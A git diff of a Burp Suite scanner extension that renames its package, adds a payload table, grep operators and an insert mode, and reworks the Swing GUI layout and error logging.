"grepsFile": "", + "IssueName": "Youtube Channel ID", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/tags.txt b/profiles/tags.txt old mode 100644 new mode 100755 index 3da46ef..16ec8a9 --- a/profiles/tags.txt +++ b/profiles/tags.txt @@ -1,22 +1,22 @@ -Collaborator -PathTraversal -RCE -SQLi -CookieAttributes -SecurityHeaders -XSS -JWT -CMS -CVE -Errors -InformationDisclosure -API -SQLi -XXE -endpoints -regex -Variations -Graphql -Cloud -All -Mobile +Collaborator +PathTraversal +RCE +SQLi +CookieAttributes +SecurityHeaders +XSS +JWT +CMS +CVE +Errors +InformationDisclosure +API +SQLi +XXE +endpoints +regex +Variations +Graphql +Cloud +All +Mobile diff --git a/src/ActiveProfile.form b/src/ActiveProfile.form index 6f2c7ac..be2b1d7 100755 --- a/src/ActiveProfile.form +++ b/src/ActiveProfile.form @@ -3,21 +3,39 @@
+ + + + + + + + + + + + + + + + + + - + @@ -52,15 +70,15 @@ - + - - + + @@ -109,7 +127,7 @@ - + @@ -157,15 +175,6 @@ - - - - - - - - - @@ -205,6 +214,18 @@ + + + + + + + + + + + + @@ -224,69 +245,68 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + @@ -303,21 +323,19 @@ - + + + + - + - - - - - - + @@ -328,12 +346,13 @@ + - + - + @@ -420,7 +439,7 @@ - + @@ -460,26 +479,6 @@ - - - - - - - - - - - - - - - - - - - - @@ -839,11 +838,6 @@ - - - - - @@ -867,6 +861,9 @@ + + + @@ -910,6 +907,47 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + @@ -937,6 +975,7 @@ + @@ -944,44 +983,9 @@ - - - - - + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - @@ -1006,35 +1010,33 @@ + + - - - - - - - + + + + + + + + + + + + + + + + - - - - - - - - - - - - - @@ -1057,8 +1059,26 @@ + + + + + + + + + + + + + + + + + + - + @@ -1067,46 +1087,15 @@ - + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + + - - - - - + + @@ -1116,19 +1105,19 @@ - - + + + - - + + - - + @@ -1154,6 +1143,12 @@ + + + + + + @@ -1182,62 +1177,6 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - @@ -1286,11 +1225,6 @@ - - - - - @@ -1317,11 +1251,6 @@ - - - - - @@ -1444,20 +1373,6 @@ - - - - - - - - - - - - - - @@ -1465,59 +1380,6 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - @@ -1922,8 +1784,6 @@ - - @@ -1996,6 +1856,292 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/src/ActiveProfile.java b/src/ActiveProfile.java index 1e3829c..1bcf10b 100755 --- a/src/ActiveProfile.java +++ b/src/ActiveProfile.java @@ -13,7 +13,7 @@ See the License for the specific language governing permissions and limitations under the License. */ -package burpbounty; +package burpbountyfree; import burp.IBurpExtenderCallbacks; import java.awt.Desktop; @@ -74,9 +74,12 @@ public class ActiveProfile extends javax.swing.JPanel { DefaultTableModel model4; DefaultTableModel model9; DefaultTableModel model10; + DefaultTableModel rulemodel; DefaultTableModel modelgrep; + DefaultTableModel modelpayload; IBurpExtenderCallbacks callbacks; String filename; + JComboBox operator; public ActiveProfile(IBurpExtenderCallbacks callbacks) { @@ -89,10 +92,12 @@ public ActiveProfile(IBurpExtenderCallbacks callbacks) { model9 = new DefaultTableModel(); model10 = new DefaultTableModel(); modelgrep = new DefaultTableModel(); + modelpayload = new DefaultTableModel(); headers = new ArrayList(); variationAttributes = new ArrayList(); insertionPointType = new ArrayList(); this.callbacks = callbacks; + operator = new JComboBox(); modelgrep = new DefaultTableModel() { @Override @@ -108,7 +113,7 @@ public Class getColumnClass(int columnIndex) { @Override public boolean isCellEditable(int row, int column) { - if (column == 1) { + if (row == 0 && column == 1) { return false; } else { return true; @@ -116,15 +121,29 @@ public boolean isCellEditable(int row, int column) { } }; - + modelpayload = new DefaultTableModel() { + @Override + public Class getColumnClass(int columnIndex) { + Class clazz = String.class; + switch (columnIndex) { + case 0: + clazz = Boolean.class; + break; + } + return clazz; + } + }; + initComponents(); + if (callbacks.loadExtensionSetting("filename") != null) { - filename = callbacks.loadExtensionSetting("filename")+ File.separator;; + filename = callbacks.loadExtensionSetting("filename") + File.separator; } else { - filename = System.getProperty("user.home")+ File.separator;; + filename = System.getProperty("user.home") + File.separator; } showHeaders(headers); showGrepsTable(); + showPayloadsTable(); } @@ -135,9 +154,13 @@ public void showGrepsTable() { modelgrep.addColumn("Operator"); modelgrep.addColumn("Value"); + operator.addItem("Or"); + operator.addItem("And"); + table5.getColumnModel().getColumn(0).setPreferredWidth(5); table5.getColumnModel().getColumn(1).setPreferredWidth(15); table5.getColumnModel().getColumn(2).setPreferredWidth(400); + table5.getColumnModel().getColumn(1).setCellEditor(new DefaultCellEditor(operator)); TableRowSorter sorter = new TableRowSorter<>(table5.getModel()); table5.setRowSorter(sorter); @@ -146,19 +169,62 @@ public void showGrepsTable() { sorter.sort(); } + public void showPayloadsTable() { + modelpayload.setNumRows(0); + modelpayload.setColumnCount(0); + modelpayload.addColumn("Enabled"); + modelpayload.addColumn("Value"); + + table6.getColumnModel().getColumn(0).setPreferredWidth(5); + table6.getColumnModel().getColumn(1).setPreferredWidth(415); + + TableRowSorter sorter = new TableRowSorter<>(table6.getModel()); + table6.setRowSorter(sorter); + List sortKeys = new ArrayList<>(); + sorter.setSortKeys(sortKeys); + sorter.sort(); + } + public void showGreps(List greps) { for (String grepline : greps) { - List array = Arrays.asList(grepline.split(",",3)); - if (array.size() > 1) { - if (array.get(0).equals("true")) { - modelgrep.addRow(new Object[]{true, array.get(1), array.get(2)}); + if(grepline.startsWith("true,") || grepline.startsWith("false,") ){ + List array = Arrays.asList(grepline.split(",", 3)); + if (modelgrep.getRowCount() == 0) { + if (array.get(0).equals("true")) { + modelgrep.addRow(new Object[]{true, "", array.get(2)}); + } else { + modelgrep.addRow(new Object[]{false, "", array.get(2)}); + } } else { - modelgrep.addRow(new Object[]{false, array.get(1), array.get(2)}); + if (array.get(0).equals("true")) { + modelgrep.addRow(new Object[]{true, array.get(1), array.get(2)}); + } else { + modelgrep.addRow(new Object[]{false, array.get(1), array.get(2)}); + } } } else { + if (modelgrep.getRowCount() == 0) { + modelgrep.addRow(new Object[]{true, "", grepline}); + } else { + modelgrep.addRow(new Object[]{true, "Or", grepline}); + } + } + } + } + + public void showPayloads(List payloads) { - modelgrep.addRow(new Object[]{true, "Or", grepline}); + for (String payloadline : payloads) { + if(payloadline.startsWith("true,") || payloadline.startsWith("false,") ){ + List array = Arrays.asList(payloadline.split(",", 2)); + if (array.get(0).equals("true")) { + modelpayload.addRow(new Object[]{true, array.get(1)}); + } else { + modelpayload.addRow(new Object[]{false, array.get(1)}); + } + } else { + modelpayload.addRow(new Object[]{true, payloadline}); } } } @@ -187,9 +253,40 @@ public void loadGrepsFile(DefaultTableModel model) { bufferreader.close(); showGreps(grep); } catch (FileNotFoundException ex) { - callbacks.printError("ActiveProfile line 213:" + ex.getMessage()); + System.out.println("ActiveProfile line 213:" + ex.getMessage()); } catch (IOException ex) { - callbacks.printError("ActiveProfile line 215:" + ex.getMessage()); + System.out.println("ActiveProfile line 215:" + ex.getMessage()); + } + } + } + + public void loadPayloadFile(DefaultTableModel model) { + //Load file for implement payloads and match load button + List payloads = new ArrayList(); + String line; + JFrame parentFrame = new JFrame(); + JFileChooser fileChooser = new JFileChooser(); + fileChooser.setDialogTitle("Specify a file to load"); + + int userSelection = fileChooser.showOpenDialog(parentFrame); + + if (userSelection == JFileChooser.APPROVE_OPTION) { + File fileload = fileChooser.getSelectedFile(); + textpayloads.setText(fileload.getAbsolutePath()); + try { + BufferedReader bufferreader = new BufferedReader(new FileReader(fileload.getAbsolutePath())); + line = bufferreader.readLine(); + + while (line != null) { + payloads.add(line); + line = bufferreader.readLine(); + } + bufferreader.close(); + showPayloads(payloads); + } catch (FileNotFoundException ex) { + System.out.println("ActiveProfile line 309:" + ex.getMessage()); + } catch (IOException ex) { + System.out.println("ActiveProfile line 308:" + ex.getMessage()); } } } @@ -278,7 +375,7 @@ public String getClipboardContents() { try { result = (String) contents.getTransferData(DataFlavor.stringFlavor); } catch (UnsupportedFlavorException | IOException ex) { - callbacks.printError("ActivePorfile line 304:" + ex.getMessage()); + System.out.println("ActiveProfile line 304:" + ex.getMessage()); } } return result; @@ -335,9 +432,9 @@ public void loadPayloadsFile(DefaultListModel list) { } bufferreader.close(); } catch (FileNotFoundException ex) { - callbacks.printError("ActivePorfile line 361:" + ex.getMessage()); + System.out.println("ActiveProfile line 361:" + ex.getMessage()); } catch (IOException ex) { - callbacks.printError("ActivePorfile line 363:" + ex.getMessage()); + System.out.println("ActiveProfile line 363:" + ex.getMessage()); } } } @@ -365,9 +462,9 @@ public void loadGrepsFile(DefaultListModel list) { } bufferreader.close(); } catch (FileNotFoundException ex) { - callbacks.printError("ActivePorfile line 391:" + ex.getMessage()); + System.out.println("ActiveProfile line 391:" + ex.getMessage()); } catch (IOException ex) { - callbacks.printError("ActivePorfile line 393:" + ex.getMessage()); + System.out.println("ActiveProfile line 393:" + ex.getMessage()); } } } @@ -379,7 +476,7 @@ public void addNewTag(String str) { out.write(str.concat("\n")); out.close(); } catch (IOException e) { - callbacks.printError("ActivePorfile line 405:" + e.getMessage()); + System.out.println("ActiveProfile line 405:" + e.getMessage()); } } } @@ -391,7 +488,7 @@ public void removeTag(String tag) { File inFile = new File(file); if (!inFile.isFile()) { - callbacks.printError("ActivePorfile line 417:"); + System.out.println("ActiveProfile line 417:"); return; } @@ -417,19 +514,19 @@ public void removeTag(String tag) { //Delete the original file if (!inFile.delete()) { - callbacks.printError("Activeprofile line 443 Could not delete file"); + System.out.println("Activeprofile line 443 Could not delete file"); return; } //Rename the new file to the filename the original file had. if (!tempFile.renameTo(inFile)) { - callbacks.printError("ActiveProfile line 449 Could not rename file"); + System.out.println("ActiveProfile line 449 Could not rename file"); } } catch (FileNotFoundException ex) { - callbacks.printError("ActivePorfile line 453:" + ex.getMessage()); + System.out.println("ActiveProfile line 453:" + ex.getMessage()); } catch (IOException ex) { - callbacks.printError("ActivePorfile line 455:" + ex.getMessage()); + System.out.println("ActiveProfile line 455:" + ex.getMessage()); } } @@ -454,7 +551,7 @@ private List readFile(String filename) { } reader.close(); } catch (Exception e) { - callbacks.printError("ActivePorfile line 494:" + e.getMessage()); + System.out.println("ActiveProfile line 494:" + e.getMessage()); } return records; } @@ -486,8 +583,6 @@ private void initComponents() { text5 = new javax.swing.JTextField(); jButton9 = new javax.swing.JButton(); button6 = new javax.swing.JButton(); - jScrollPane3 = new javax.swing.JScrollPane(); - list1 = new javax.swing.JList<>(); jButton8 = new javax.swing.JButton(); jScrollPane14 = new javax.swing.JScrollPane(); table4 = new javax.swing.JTable(); @@ -529,7 +624,6 @@ private void initComponents() { replace = new javax.swing.JRadioButton(); jLabel5 = new javax.swing.JLabel(); check8 = new javax.swing.JCheckBox(); - textfield1 = new javax.swing.JTextField(); entirebody = new javax.swing.JCheckBox(); All = new javax.swing.JCheckBox(); paramxml = new javax.swing.JCheckBox(); @@ -539,24 +633,21 @@ private void initComponents() { jButton7 = new javax.swing.JButton(); jLabel1 = new javax.swing.JLabel(); jLabel20 = new javax.swing.JLabel(); + insert = new javax.swing.JRadioButton(); + jScrollPane16 = new javax.swing.JScrollPane(); + table6 = new javax.swing.JTable(); jScrollPane6 = new javax.swing.JScrollPane(); jPanel11 = new javax.swing.JPanel(); - radio12 = new javax.swing.JRadioButton(); - radio4 = new javax.swing.JRadioButton(); - radio3 = new javax.swing.JRadioButton(); - radio22 = new javax.swing.JRadioButton(); check4 = new javax.swing.JCheckBox(); check1 = new javax.swing.JCheckBox(); excludehttp = new javax.swing.JCheckBox(); onlyhttp = new javax.swing.JCheckBox(); check71 = new javax.swing.JCheckBox(); check72 = new javax.swing.JCheckBox(); - texttime = new javax.swing.JTextField(); text72 = new javax.swing.JTextField(); text71 = new javax.swing.JTextField(); negativeCT = new javax.swing.JCheckBox(); negativeRC = new javax.swing.JCheckBox(); - jLabel16 = new javax.swing.JLabel(); jLabel24 = new javax.swing.JLabel(); jLabel25 = new javax.swing.JLabel(); jLabel26 = new javax.swing.JLabel(); @@ -573,14 +664,8 @@ private void initComponents() { rb4 = new javax.swing.JRadioButton(); jLabel2 = new javax.swing.JLabel(); sp1 = new javax.swing.JSpinner(); - radiotime = new javax.swing.JRadioButton(); jLabel6 = new javax.swing.JLabel(); jSeparator11 = new javax.swing.JSeparator(); - jLabel42 = new javax.swing.JLabel(); - radiocl = new javax.swing.JRadioButton(); - textcl = new javax.swing.JTextField(); - variationsRadio = new javax.swing.JRadioButton(); - invariationsRadio = new javax.swing.JRadioButton(); Attributes = new javax.swing.JPanel(); status_code = new javax.swing.JCheckBox(); input_image_labels = new javax.swing.JCheckBox(); @@ -613,7 +698,6 @@ private void initComponents() { limited_body_content = new javax.swing.JCheckBox(); canonical_link = new javax.swing.JCheckBox(); anchor_labels = new javax.swing.JCheckBox(); - jSeparator12 = new javax.swing.JSeparator(); jScrollPane15 = new javax.swing.JScrollPane(); table5 = new javax.swing.JTable(); button20 = new javax.swing.JButton(); @@ -622,6 +706,26 @@ private void initComponents() { button21 = new javax.swing.JButton(); button8 = new javax.swing.JButton(); textgreps = new javax.swing.JTextField(); + negativeURL = new javax.swing.JCheckBox(); + text73 = new javax.swing.JTextField(); + check73 = new javax.swing.JCheckBox(); + jPanel1 = new javax.swing.JPanel(); + radiocl = new javax.swing.JRadioButton(); + textcl = new javax.swing.JTextField(); + radio12 = new javax.swing.JRadioButton(); + radio22 = new javax.swing.JRadioButton(); + jLabel42 = new javax.swing.JLabel(); + invariationsRadio = new javax.swing.JRadioButton(); + radiotime = new javax.swing.JRadioButton(); + radiohttp = new javax.swing.JRadioButton(); + radio3 = new javax.swing.JRadioButton(); + texttime1 = new javax.swing.JTextField(); + jLabel21 = new javax.swing.JLabel(); + radio4 = new javax.swing.JRadioButton(); + texttime2 = new javax.swing.JTextField(); + jLabel16 = new javax.swing.JLabel(); + variationsRadio = new javax.swing.JRadioButton(); + resposecode = new javax.swing.JTextField(); jScrollPane10 = new javax.swing.JScrollPane(); jPanel12 = new javax.swing.JPanel(); jLabel32 = new javax.swing.JLabel(); @@ -671,7 +775,7 @@ private void initComponents() { jLabel47 = new javax.swing.JLabel(); newTagb = new javax.swing.JButton(); - setPreferredSize(new java.awt.Dimension(800, 600)); + setPreferredSize(new java.awt.Dimension(831, 664)); text1.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N @@ -685,7 +789,7 @@ private void initComponents() { headerstab.setAutoscrolls(true); headerstab.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N - headerstab.setPreferredSize(new java.awt.Dimension(780, 570)); + headerstab.setPreferredSize(new java.awt.Dimension(750, 500)); headerstab.addChangeListener(new javax.swing.event.ChangeListener() { public void stateChanged(javax.swing.event.ChangeEvent evt) { headerstabStateChanged(evt); @@ -713,9 +817,6 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { } }); - list1.setModel(payload); - jScrollPane3.setViewportView(list1); - jButton8.setText("Up"); jButton8.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { @@ -858,6 +959,11 @@ public void itemStateChanged(java.awt.event.ItemEvent evt) { }); paramxml.setText("Param xml"); + paramxml.addActionListener(new java.awt.event.ActionListener() { + public void actionPerformed(java.awt.event.ActionEvent evt) { + paramxmlActionPerformed(evt); + } + }); jLabel23.setText("You can define the encoding of payloads. You can encode each payload multiple times."); @@ -877,6 +983,14 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { jLabel20.setText("- {BC} token will be replaced by burpcollaborator host"); + buttonGroup1.add(insert); + insert.setText("Insert"); + + table6.setFont(new java.awt.Font("Lucida Grande", 0, 13)); // NOI18N + table6.setModel(modelpayload); + table6.setShowGrid(false); + jScrollPane16.setViewportView(table6); + javax.swing.GroupLayout jPanel10Layout = new javax.swing.GroupLayout(jPanel10); jPanel10.setLayout(jPanel10Layout); jPanel10Layout.setHorizontalGroup( @@ -884,13 +998,6 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addGroup(jPanel10Layout.createSequentialGroup() .addContainerGap() .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addGroup(jPanel10Layout.createSequentialGroup() - .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(jLabel22) - .addComponent(jLabel23, javax.swing.GroupLayout.PREFERRED_SIZE, 704, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(jLabel54) - .addComponent(jLabel55, javax.swing.GroupLayout.PREFERRED_SIZE, 704, javax.swing.GroupLayout.PREFERRED_SIZE)) - .addGap(0, 0, Short.MAX_VALUE)) .addGroup(jPanel10Layout.createSequentialGroup() .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel10Layout.createSequentialGroup() @@ -921,6 +1028,15 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(jLabel1) .addComponent(jScrollPane14, javax.swing.GroupLayout.PREFERRED_SIZE, 673, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(jLabel20))))) + .addComponent(jLabel19, javax.swing.GroupLayout.PREFERRED_SIZE, 704, javax.swing.GroupLayout.PREFERRED_SIZE) + .addGroup(jPanel10Layout.createSequentialGroup() + .addGap(47, 47, 47) + .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(jLabel17, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) + .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING) + .addComponent(jLabel10) + .addComponent(jLabel11)))) + .addComponent(jLabel5) .addGroup(jPanel10Layout.createSequentialGroup() .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING) .addComponent(button6, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE) @@ -935,53 +1051,53 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(button2, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE))) .addGap(18, 18, 18) .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false) - .addComponent(jScrollPane3, javax.swing.GroupLayout.DEFAULT_SIZE, 670, Short.MAX_VALUE) - .addComponent(textfield1) - .addComponent(textpayloads))) - .addComponent(jLabel19, javax.swing.GroupLayout.PREFERRED_SIZE, 704, javax.swing.GroupLayout.PREFERRED_SIZE) - .addGroup(jPanel10Layout.createSequentialGroup() - .addGap(47, 47, 47) - .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(jLabel17, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) - .addGroup(jPanel10Layout.createSequentialGroup() - .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING) - .addComponent(jLabel10) - .addComponent(jLabel11)) - .addGap(18, 18, 18) - .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addGroup(jPanel10Layout.createSequentialGroup() - .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(extensionprovided) - .addComponent(header) - .addComponent(urlpathfilename) - .addComponent(entirebody) - .addComponent(paramxml) - .addComponent(All)) - .addGap(42, 42, 42) - .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(paramjson) - .addComponent(parambody) - .addComponent(paramcookie) - .addComponent(urlpathfolder) - .addComponent(paramamf) - .addComponent(paramxmlattr)) - .addGap(39, 39, 39) - .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(unknown) - .addComponent(parammultipartattr) - .addComponent(paramnamebody) - .addComponent(paramnameurl) - .addComponent(userprovided) - .addComponent(paramurl))) - .addGroup(jPanel10Layout.createSequentialGroup() - .addComponent(replace) - .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) - .addComponent(append)))))) - .addComponent(jLabel5)) - .addContainerGap(15, Short.MAX_VALUE)))) + .addComponent(textpayloads, javax.swing.GroupLayout.DEFAULT_SIZE, 670, Short.MAX_VALUE) + .addComponent(jScrollPane16)))) + .addContainerGap(15, Short.MAX_VALUE)) + .addGroup(jPanel10Layout.createSequentialGroup() + .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(jLabel22) + .addComponent(jLabel23, javax.swing.GroupLayout.PREFERRED_SIZE, 704, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(jLabel54) + .addComponent(jLabel55, javax.swing.GroupLayout.PREFERRED_SIZE, 704, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addGap(0, 0, Short.MAX_VALUE)))) .addComponent(jSeparator2) .addComponent(jSeparator4) .addComponent(jSeparator3, javax.swing.GroupLayout.Alignment.TRAILING) + .addGroup(jPanel10Layout.createSequentialGroup() + .addGap(183, 183, 183) + .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addGroup(jPanel10Layout.createSequentialGroup() + .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(extensionprovided) + .addComponent(header) + .addComponent(urlpathfilename) + .addComponent(entirebody) + .addComponent(paramxml) + .addComponent(All)) + .addGap(30, 30, 30) + .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(paramjson) + .addComponent(parambody) + .addComponent(paramcookie) + .addComponent(urlpathfolder) + .addComponent(paramamf) + .addComponent(paramxmlattr)) + .addGap(51, 51, 51) + .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(unknown) + .addComponent(parammultipartattr) + .addComponent(paramnamebody) + .addComponent(paramnameurl) + .addComponent(userprovided) + .addComponent(paramurl))) + .addGroup(jPanel10Layout.createSequentialGroup() + .addComponent(replace) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) + .addComponent(append) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) + .addComponent(insert))) + .addGap(0, 0, Short.MAX_VALUE)) ); jPanel10Layout.setVerticalGroup( jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) @@ -997,16 +1113,15 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addGap(18, 18, 18) .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel10Layout.createSequentialGroup() + .addComponent(button6) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(button2) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(button4) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) - .addComponent(button5)) - .addComponent(jScrollPane3, javax.swing.GroupLayout.PREFERRED_SIZE, 111, javax.swing.GroupLayout.PREFERRED_SIZE)) - .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) - .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) - .addComponent(button6) - .addComponent(textfield1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addComponent(button5) + .addGap(0, 96, Short.MAX_VALUE)) + .addComponent(jScrollPane16, javax.swing.GroupLayout.PREFERRED_SIZE, 0, Short.MAX_VALUE)) .addGap(18, 18, 18) .addComponent(jSeparator2, javax.swing.GroupLayout.PREFERRED_SIZE, 10, javax.swing.GroupLayout.PREFERRED_SIZE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) @@ -1017,12 +1132,13 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(jLabel10) .addComponent(append) - .addComponent(replace)) - .addGap(32, 32, 32) + .addComponent(replace) + .addComponent(insert)) + .addGap(23, 23, 23) .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel10Layout.createSequentialGroup() .addComponent(jLabel11) - .addGap(154, 154, 154) + .addGap(151, 151, 151) .addComponent(jLabel17, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(18, 18, 18) .addComponent(jSeparator4, javax.swing.GroupLayout.PREFERRED_SIZE, 10, javax.swing.GroupLayout.PREFERRED_SIZE) @@ -1094,7 +1210,7 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(paramxml) .addComponent(paramxmlattr) .addComponent(unknown)))) - .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)) + .addContainerGap()) ); jScrollPane5.setViewportView(jPanel10); @@ -1106,38 +1222,6 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { jPanel11.setAutoscrolls(true); - buttonGroup3.add(radio12); - radio12.setText("Payload"); - radio12.addItemListener(new java.awt.event.ItemListener() { - public void itemStateChanged(java.awt.event.ItemEvent evt) { - radio12payloadMatchType(evt); - } - }); - - buttonGroup3.add(radio4); - radio4.setText("Simple string"); - radio4.addItemListener(new java.awt.event.ItemListener() { - public void itemStateChanged(java.awt.event.ItemEvent evt) { - radio4stringMatchType(evt); - } - }); - - buttonGroup3.add(radio3); - radio3.setText("Regex"); - radio3.addItemListener(new java.awt.event.ItemListener() { - public void itemStateChanged(java.awt.event.ItemEvent evt) { - radio3regexMatchType(evt); - } - }); - - buttonGroup3.add(radio22); - radio22.setText("Payload without encode"); - radio22.addItemListener(new java.awt.event.ItemListener() { - public void itemStateChanged(java.awt.event.ItemEvent evt) { - radio22payloadencodeMatchType(evt); - } - }); - check4.setText("Negative match"); check1.setText("Case sensitive"); @@ -1154,8 +1238,6 @@ public void itemStateChanged(java.awt.event.ItemEvent evt) { negativeRC.setText("Negative match"); - jLabel16.setText("Seconds"); - jLabel24.setText("You can define one or more greps. For each payload response, each grep will be searched with specific grep options."); jLabel25.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N @@ -1194,47 +1276,8 @@ public void itemStateChanged(java.awt.event.ItemEvent evt) { jLabel2.setText("Max redirections:"); - buttonGroup3.add(radiotime); - radiotime.setText("Timeout equal or more than "); - radiotime.addItemListener(new java.awt.event.ItemListener() { - public void itemStateChanged(java.awt.event.ItemEvent evt) { - radiotimeTimeoutSelect(evt); - } - }); - jLabel6.setText("Follow redirections: "); - jLabel42.setText("Bytes"); - - buttonGroup3.add(radiocl); - radiocl.setText("Content Length difference"); - radiocl.addItemListener(new java.awt.event.ItemListener() { - public void itemStateChanged(java.awt.event.ItemEvent evt) { - radioclSelect(evt); - } - }); - radiocl.addActionListener(new java.awt.event.ActionListener() { - public void actionPerformed(java.awt.event.ActionEvent evt) { - radioclActionPerformed(evt); - } - }); - - buttonGroup3.add(variationsRadio); - variationsRadio.setText("Variations"); - variationsRadio.addItemListener(new java.awt.event.ItemListener() { - public void itemStateChanged(java.awt.event.ItemEvent evt) { - variationsRadiovariations(evt); - } - }); - - buttonGroup3.add(invariationsRadio); - invariationsRadio.setText("Invariations"); - invariationsRadio.addItemListener(new java.awt.event.ItemListener() { - public void itemStateChanged(java.awt.event.ItemEvent evt) { - invariationsRadioinvariations(evt); - } - }); - Attributes.setBorder(javax.swing.BorderFactory.createTitledBorder(null, "Attributes", javax.swing.border.TitledBorder.CENTER, javax.swing.border.TitledBorder.TOP)); status_code.setText("status_code"); @@ -1464,86 +1507,217 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { } }); - javax.swing.GroupLayout jPanel11Layout = new javax.swing.GroupLayout(jPanel11); - jPanel11.setLayout(jPanel11Layout); - jPanel11Layout.setHorizontalGroup( - 